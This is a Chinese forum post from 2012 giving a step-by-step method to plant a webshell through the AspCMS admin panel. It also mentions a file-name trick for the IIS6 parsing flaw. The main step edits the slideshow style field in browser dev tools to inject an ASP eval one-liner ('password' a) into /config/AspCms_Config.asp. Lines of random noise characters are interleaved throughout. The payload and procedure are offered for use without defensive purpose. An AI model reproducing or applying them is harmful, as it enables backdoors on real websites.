aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
9 Z7 r( z4 P" `8 X: B- {1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
6 P+ M# B B; x
$ x V. T4 I: M
* Y) b$ c3 {- r; T# Q% `
0 ~7 Z9 ~% {4 \- f7 r( z2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%+ t" G+ C: \4 _
h" l2 R7 O$ E# ^- ?9 ^. ?2 v0 A9 T" ^* U3 W2 I
3、一句话木马,密码a。在/config/AspCms_Config.asp
% {& G V3 Z9 L) ^9 X( C S3 i) j2 t2 W& k3 n
6 {6 i; N$ S, @" d. ? |
发表于 2012-11-9 20:55:05
收藏
支持
反对